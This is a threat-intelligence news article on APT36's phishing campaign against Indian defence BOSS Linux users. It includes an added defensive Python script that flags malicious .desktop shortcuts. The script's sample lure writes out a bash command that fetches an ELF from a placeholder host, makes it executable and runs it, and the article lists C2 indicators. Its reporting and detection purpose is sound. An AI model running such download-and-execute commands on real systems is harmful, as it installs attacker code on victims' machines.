Pakistan’s Transparent Tribe Hits Indian Defence with Linux Malware

A sophisticated cyber espionage operation, believed to be run by a group known as APT36 (also called Transparent Tribe), is now targeting Indian defence personnel and organizations. This Pakistan-based group is targeting systems running BOSS Linux, a version of the Linux operating system commonly used by Indian government agencies.

This marks a new step in the group's tooling: it now uses malicious software built specifically for Linux environments. The threat was reported by cybersecurity firm Cyfirma, and the findings were shared with Hackread.com.

Cyfirma researchers first observed this new attack on June 7, 2025. According to their research, the attackers use cunning phishing emails to trick their targets. These emails carry a compressed file, typically a ZIP archive named “Cyber-Security-Advisory.zip,” which contains a harmful ‘.desktop’ file, essentially a shortcut used on Linux systems.

Figure: Attack Flow (Source: Cyfirma)

When a victim opens this shortcut, two things happen at once. First, as a diversion, a normal-looking PowerPoint file appears, distracting the user and making the attack seem legitimate. The .desktop file achieves this by quietly downloading the PowerPoint file and then opening it.

Second, in the background, another malicious program (named BOSS.elf, saved locally as client.elf) is secretly downloaded and run. This hidden program is an Executable and Linkable Format (ELF) binary, which is a standard file format for executable programs on Linux, just like an .exe file on Windows. It is written in the Go programming language and serves as the primary payload designed to compromise the host system and facilitate unauthorized access.
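To make that mechanism concrete from the defender's side, here is an added example (not Cyfirma's or Hackread's code) of a small Python triage script: it parses a .desktop file and flags the traits of the lure described above, namely an Exec= line that invokes a shell, fetches from a URL, marks a file executable and stages it in a temporary directory, all with Terminal=false so nothing is shown to the user. The sample shortcut and its URLs are constructed placeholders, not the campaign's actual files or infrastructure.

```python
"""Static triage of a Linux .desktop file for the download-and-execute lure pattern."""
import re

# Exec= tokens that warrant review when the shortcut arrived inside an e-mailed archive.
DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
STAGING_RE = re.compile(r"(^|[\s=])(/tmp/|/dev/shm/|/var/tmp/|~/\.|\$HOME/\.)")

def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group (minimal parser)."""
    entries, group = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
        elif group == "Desktop Entry" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries

def triage(text):
    """Return a list of findings for one .desktop file; an empty list means nothing flagged."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    # Split on whitespace, shell separators and quotes; keep only the basename of paths.
    words = {w.rsplit("/", 1)[-1] for w in re.split(r"""[\s;|&"']+""", exec_line) if w}
    findings = []
    if words & INTERPRETERS:
        findings.append("Exec invokes a shell or script interpreter")
    if words & DOWNLOADERS or URL_RE.search(exec_line):
        findings.append("Exec fetches content from a URL")
    if "chmod" in words:
        findings.append("Exec changes file permissions, e.g. to make a download executable")
    if STAGING_RE.search(exec_line):
        findings.append("Exec stages files in a temporary or hidden directory")
    if words & INTERPRETERS and entry.get("Terminal", "false").lower() == "false":
        findings.append("Shell runs with Terminal=false, so the user sees no window")
    return findings

# Constructed sample mirroring the reported lure (decoy deck, then a fetched ELF); placeholder URLs.
SAMPLE_LURE = """[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory
Terminal=false
Exec=bash -c "curl -s -o /tmp/decoy.pptx http://placeholder.invalid/d.pptx; xdg-open /tmp/decoy.pptx; curl -s -o /tmp/client.elf http://placeholder.invalid/BOSS.elf; chmod +x /tmp/client.elf; /tmp/client.elf"
"""
SAMPLE_BENIGN = """[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\nTerminal=false\n"""
```

Running `triage()` over every .desktop file extracted from a mailed archive, before any of them can be double-clicked, gives a cheap first-pass check; a file with several findings should be quarantined rather than opened.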

Figure: Malicious Files (Source: Cyfirma)

The malware also attempts to connect to a control server at the IP address 101.99.92.182 on port 12520. It’s important to note that the domain sorlastore.com has been identified by security researchers as malicious infrastructure actively used by APT36, particularly against personnel and systems within the Indian defence sector.

This multi-step attack is designed to get past security checks and avoid being noticed, allowing the attackers to maintain access to sensitive computer systems. The use of malware specifically built for Linux shows that APT36’s capabilities are growing, posing a greater danger to vital government and defence computer networks.

Hackread.com has diligently monitored the activities of the Transparent Tribe since its emergence. They gained prominence with Operation C-Major in March 2016, which used spear-phishing and an Adobe Reader vulnerability to distribute spyware to Indian military employees and steal login details from Indian army officials via a malicious Android app called SmeshApp.

More recently, in July 2024, the group was observed disguising Android spyware CapraRAT as popular mobile apps like “Crazy Games” and “TikTok” to steal data. This latest campaign indicates an expansion of their targets beyond just military personnel and also highlights their continued dedication to Indian targets and their adaptable approach to exploiting various platforms.

Therefore, organizations, especially those in the public sector using Linux-based systems, are urged to take this threat very seriously. Strong cybersecurity measures and threat detection tools are crucial to protect against these evolving attacks.

Even a PowerPoint presentation has the power to help automate, but it should only do so when you know it’s legitimate, emphasised Jason Soroko, Senior Fellow at Sectigo, a Scottsdale, Arizona-based provider of comprehensive certificate lifecycle management (CLM).

Prevention improves when BOSS Linux images disable the auto-execution of desktop shortcuts and enforce application allow-lists that limit what runs outside signed repositories. PowerPoint viewers should open in read-only mode, and downloads from untrusted networks should land in a no-execute mount. Zero trust segmentation keeps a compromised workstation isolated from classified enclaves, Jason advised.
